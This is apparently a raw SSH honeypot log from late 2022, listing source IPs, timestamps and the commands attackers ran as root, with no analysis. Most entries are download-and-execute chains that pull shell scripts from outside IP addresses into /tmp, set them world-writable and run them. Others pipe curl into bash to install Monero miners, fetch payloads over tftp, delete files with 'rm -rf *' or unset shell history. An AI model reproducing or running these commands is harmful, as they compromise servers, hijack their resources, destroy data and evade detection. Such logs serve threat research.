31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.c4c$RANDOM -p x -k --nicehash --coin monero -a rx/0 ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.c4c$RANDOM -p x -k --nicehash --coin monero -a rx/0 From 35.185.96.254 6-Oct-2022 19:53:02 ssh2 root Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* sh wget.sh server wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server From 34.168.97.42 6-Oct-2022 21:15:27 ssh2 root Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server wget http://179.43.175.5/wget.sh cd /tmp rm -rf wget* curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh wget http://179.43.175.5/wget.sh ./wget.sh server curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh sh wget.sh server ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server From 185.196.220.32 9-Oct-2022 06:18:54 ssh2 root Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server; rm -rf * cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server rm -rf * From 35.234.68.224 18-Oct-2022 00:30:49 ssh2 root Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server ./wget.sh server sh wget.sh server sh wget.sh server From 34.89.68.121 18-Oct-2022 17:20:35 ssh2 root Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server wget http://179.43.175.5/wget.sh cd /tmp Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server rm -rf wget* curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh wget http://179.43.175.5/wget.sh ./wget.sh server curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server sh wget.sh server ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server From 34.142.109.103 20-Oct-2022 21:40:23 ssh2 root Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server ./wget.sh server cd /tmp rm -rf wget* sh wget.sh server wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server From 34.142.14.174 21-Oct-2022 01:21:17 ssh2 root Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server From 35.245.11.156 22-Oct-2022 20:01:47 ssh2 root Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh cd /tmp rm -rf wget* ./wget.sh server wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh sh wget.sh server chmod 777 wget.sh ./wget.sh server sh wget.sh server From 35.242.189.58 23-Oct-2022 01:44:21 ssh2 root Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh cd /tmp rm -rf wget* ./wget.sh server sh wget.sh server wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server Exec cd /tmp; rm -rf wget*; wget http://179.43.175.5/wget.sh; curl -O http://179.43.175.5/wget.sh; chmod 777 wget.sh; ./wget.sh server; sh wget.sh server cd /tmp rm -rf wget* wget http://179.43.175.5/wget.sh curl -O http://179.43.175.5/wget.sh chmod 777 wget.sh ./wget.sh server sh wget.sh server From 35.189.124.177 2-Nov-2022 12:15:24 ssh2 root Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh cd /tmp rm -rf 774.sh* wget http://179.43.175.5/774.sh curl -O http://179.43.175.5/774.sh chmod 777 774.sh ./774.sh sh 774.sh Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh cd /tmp rm -rf 774.sh* wget http://179.43.175.5/774.sh curl -O http://179.43.175.5/774.sh chmod 777 774.sh ./774.sh sh 774.sh Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh cd /tmp rm -rf 774.sh* wget http://179.43.175.5/774.sh curl -O http://179.43.175.5/774.sh chmod 777 774.sh ./774.sh sh 774.sh Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh cd /tmp rm -rf 774.sh* wget http://179.43.175.5/774.sh curl -O http://179.43.175.5/774.sh chmod 777 774.sh ./774.sh sh 774.sh From 34.82.200.51 5-Nov-2022 00:12:16 ssh2 root Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh cd /tmp Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh rm -rf 774.sh* cd /tmp rm -rf 774.sh* wget http://179.43.175.5/774.sh wget http://179.43.175.5/774.sh curl -O http://179.43.175.5/774.sh curl -O http://179.43.175.5/774.sh chmod 777 774.sh chmod 777 774.sh ./774.sh ./774.sh sh 774.sh sh 774.sh Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh cd /tmp rm -rf 774.sh* wget http://179.43.175.5/774.sh curl -O http://179.43.175.5/774.sh chmod 777 774.sh ./774.sh sh 774.sh From 35.188.162.38 5-Nov-2022 04:12:41 ssh2 root Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh cd /tmp rm -rf 774.sh* wget http://179.43.175.5/774.sh curl -O http://179.43.175.5/774.sh chmod 777 774.sh ./774.sh sh 774.sh Exec cd /tmp; rm -rf 774.sh*; wget http://179.43.175.5/774.sh; curl -O http://179.43.175.5/774.sh; chmod 777 774.sh; ./774.sh; sh 774.sh cd /tmp rm -rf 774.sh* wget http://179.43.175.5/774.sh curl -O http://179.43.175.5/774.sh chmod 777 774.sh ./774.sh sh 774.sh From 3.238.110.91 11-Nov-2022 16:34:32 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://3.90.219.71/Dynabins.sh; curl http://3.90.219.71/Dynabins.sh; chmod 777 Dynabins.sh; sh Dynabins.sh; tftp 3.90.219.71 -c get Dynatftp1.sh; chmod 777 Dynatftp1.sh; sh Dynatftp1.sh; tftp -r Dynatftp2.sh -g 3.90.219.71; chmod 777 Dynatftp2.sh; sh Dynatftp2.sh; rm -rf Dynabins.sh Dynatftp1.sh Dynatftp2.sh; rm -fr * cd /tmp || cd /run || cd / wget http://3.90.219.71/Dynabins.sh curl http://3.90.219.71/Dynabins.sh chmod 777 Dynabins.sh sh Dynabins.sh tftp 3.90.219.71 -c get Dynatftp1.sh chmod 777 Dynatftp1.sh sh Dynatftp1.sh tftp -r Dynatftp2.sh -g 3.90.219.71 chmod 777 Dynatftp2.sh sh Dynatftp2.sh rm -rf Dynabins.sh Dynatftp1.sh Dynatftp2.sh rm -fr * From 3.136.23.179 13-Nov-2022 04:19:09 ssh2 root Exec curl -s http://18.188.207.128/bins.sh | bash curl -s http://18.188.207.128/bins.sh | bash From 148.72.247.138 10-Dec-2022 06:30:49 ssh2 root Exec curl -s -L http://148.72.247.138/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash curl -s -L http://148.72.247.138/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash From 148.72.247.138 10-Dec-2022 06:33:54 ssh2 root Exec curl -s -L http://148.72.247.138/setup_c3pool_miner.sh | bash curl -s -L http://148.72.247.138/setup_c3pool_miner.sh | bash From 148.72.247.138 10-Dec-2022 06:45:54 ssh2 root Exec whoami > sbmg whoami > sbmg From 159.223.89.88 11-Dec-2022 16:11:01 ssh2 root Exec unset HISTFILE ; unset HISTSIZE unset HISTFILE unset HISTSIZE From 34.107.101.194 23-Dec-2022 03:52:27 ssh2 root Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server cd /tmp rm -rf 351* wget http://45.67.230.216/351.sh curl -O http://45.67.230.216/351.sh chmod 777 351.sh ./351.sh server sh 351.sh server Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server cd /tmp rm -rf 351* wget http://45.67.230.216/351.sh curl -O http://45.67.230.216/351.sh chmod 777 351.sh ./351.sh server sh 351.sh server Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server cd /tmp rm -rf 351* wget http://45.67.230.216/351.sh curl -O http://45.67.230.216/351.sh chmod 777 351.sh ./351.sh server sh 351.sh server Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server cd /tmp rm -rf 351* wget http://45.67.230.216/351.sh curl -O http://45.67.230.216/351.sh chmod 777 351.sh ./351.sh server sh 351.sh server Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server cd /tmp rm -rf 351* wget http://45.67.230.216/351.sh curl -O http://45.67.230.216/351.sh chmod 777 351.sh ./351.sh server sh 351.sh server Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server cd /tmp rm -rf 351* wget http://45.67.230.216/351.sh curl -O http://45.67.230.216/351.sh chmod 777 351.sh ./351.sh server sh 351.sh server Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server cd /tmp rm -rf 351* wget http://45.67.230.216/351.sh curl -O http://45.67.230.216/351.sh chmod 777 351.sh ./351.sh server sh 351.sh server From 34.107.101.194 23-Dec-2022 03:53:29 ssh2 root Exec cd /tmp; rm -rf 351*; wget http://45.67.230.216/351.sh; curl -O http://45.67.230.216/351.sh; chmod 777 351.sh; ./351.sh server; sh 351.sh server cd /tmp rm -rf 351* wget http://45.67.230.216/351.sh curl -O http://45.67.230.216/351.sh chmod 777 351.sh ./351.sh server sh 351.sh server